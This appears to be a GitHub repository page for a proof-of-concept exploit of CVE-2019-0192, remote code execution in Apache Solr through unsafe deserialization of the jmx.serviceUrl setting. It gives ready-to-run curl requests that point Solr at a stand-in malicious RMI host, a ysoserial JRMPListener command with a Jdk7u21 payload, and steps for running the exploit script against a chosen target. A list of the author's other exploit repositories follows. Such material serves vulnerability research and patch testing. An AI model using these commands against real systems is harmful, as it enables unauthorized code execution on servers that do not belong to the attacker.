• Stars
    star
    209
  • Rank 188,325 (Top 4 %)
  • Language
    Python
  • Created over 5 years ago
  • Updated over 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

RCE on Apache Solr using deserialization of untrusted data via jmx.serviceUrl

CVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5

This is an early PoC of the Apache Solr RCE

From https://issues.apache.org/jira/browse/SOLR-13301:

ConfigAPI allows to configure Solr's JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

Proof Of Concept

image


By looking on the description of the security advisory and checking on the ConfigAPI ressources of Apache Solr, we can find a reference to a JMX server:

image

serviceUrl - (optional str) service URL for a JMX server. If not specified then the default platform MBean server will be used.

By checking how ConfigAPI is working we can reproduce how to set a remote JMX server:

curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

For the PoC I will use yoserial to create a malicious RMI server using the payload Jdk7u21

  1. Start the malicous RMI server:
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/pwn.txt"
  1. Run the POST request:
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

note: you should get a 500 error with a nice stacktrace

  1. Check the stacktrace:
  • If you saw this error: "Non-annotation type in annotation serial stream" it's mean that Apache Solr is running with a java version > JRE 7u25 and this poc will not work

  • Otherwise you sould see this error: "undeclared checked exception; nested exception is" and the PoC should work.

Exploit

  1. Download yoserial : https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
  2. Change values into the script:
remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"
RPORT = "1099"
  1. Then execute the script:
python3 CVE-2019-0192.py

Security Advisory:

Ressources:

More Repositories

1

BackupOperatorToDA

From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller
C++
389
star
2

Padding-oracle-attack

🔓 Padding oracle attack against PKCS7 🔓
Python
319
star
3

Spring-Boot-Actuator-Exploit

Spring Boot Actuator (jolokia) XXE/RCE
Java
318
star
4

poodle-PoC

🐩 Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 🐩
Python
246
star
5

ByP-SOP

🏴‍☠️ Bypass Same Origin Policy with DNS-rebinding to retrieve local server files 🏴‍☠️
HTML
195
star
6

CVE-2019-5418

CVE-2019-5418 - File Content Disclosure on Ruby on Rails
192
star
7

CVE-2019-19781

CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit
Python
155
star
8

CVE-2019-7238

🐱‍💻 Poc of CVE-2019-7238 - Nexus Repository Manager 3 Remote Code Execution 🐱‍💻
Python
149
star
9

Rails-doubletap-RCE

RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)
Ruby
133
star
10

discord-e2e-encryption

🔑 Tampermonkey script that encrypt and decrypt your messages on Discord 🔑
JavaScript
87
star
11

heartbleed-PoC

💔 Hearbleed exploit to retrieve sensitive information CVE-2014-0160 💔
Python
78
star
12

BEAST-PoC

💪 Proof Of Concept of the BEAST attack against SSL/TLS CVE-2011-3389 💪
Python
67
star
13

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
58
star
14

CVE-2019-7609

RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer
52
star
15

CVE-2019-9580

CVE-2019-9580 - StackStorm: exploiting CORS misconfiguration (null origin) to gain RCE
HTML
32
star
16

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6
31
star
17

CRIME-poc

🔪 CRIME attack PoC : a compression oracle attacks CVE-2012-4929 🔪
Python
27
star
18

astudiaeth

Master CSI
TeX
26
star
19

CVE-2018-16341

CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
Python
24
star
20

ntlmrelayx-prettyloot

Convert the loot directory of ntlmrelayx into an enum4linux like output
Python
21
star
21

CVE-2018-19276

CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE
Python
16
star
22

HallOfFame-Root-me.org

💀 Root-me Hall Of Fame dashboard 💀
Python
14
star
23

DllInjectExec

💉 Dll injection for executable file 💉
C++
13
star
24

Slanger-RCE

RCE in Slanger using deserialization of Ruby objects
Python
11
star
25

CVE-2018-3760

Rails Asset Pipeline Directory Traversal Vulnerability
8
star
26

ropycat

Scripts that allow you to copy/past text into another Windows process to bypass Citrix copy/paste limitation
C#
8
star
27

CVE-2019-9978

CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3
8
star
28

discourse-cookie-token-domain

🍪 Allow to setup cookie token to authenticate user 🍪
Ruby
7
star
29

CVE-2018-11686

CVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6
Python
6
star
30

ShareP0wn

ShareP0wn
Python
6
star
31

copper-jekyll-theme

Copper Jekyll theme - simple and useful
CSS
5
star
32

YTC-ID

📌 Get the YouTube channel ID ! 📌
HTML
4
star
33

DllInjectService

💉 Dll ready to be injected into a service 💉
C++
4
star
34

docker_dashboard

Python
4
star
35

impacket-cme

Python
2
star
36

AChat-Reverse-TCP-Exploit

Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64
Python
2
star
37

Ipsum

Small app for YouTube Network. Get a free submit form for YouTube Channel who want join your network. With AngularJS
JavaScript
1
star
38

Pyrox

For Youtube Network with YouTube API V3 Public
PHP
1
star
39

swindle

Swindle is a project for YouTube Network
PHP
1
star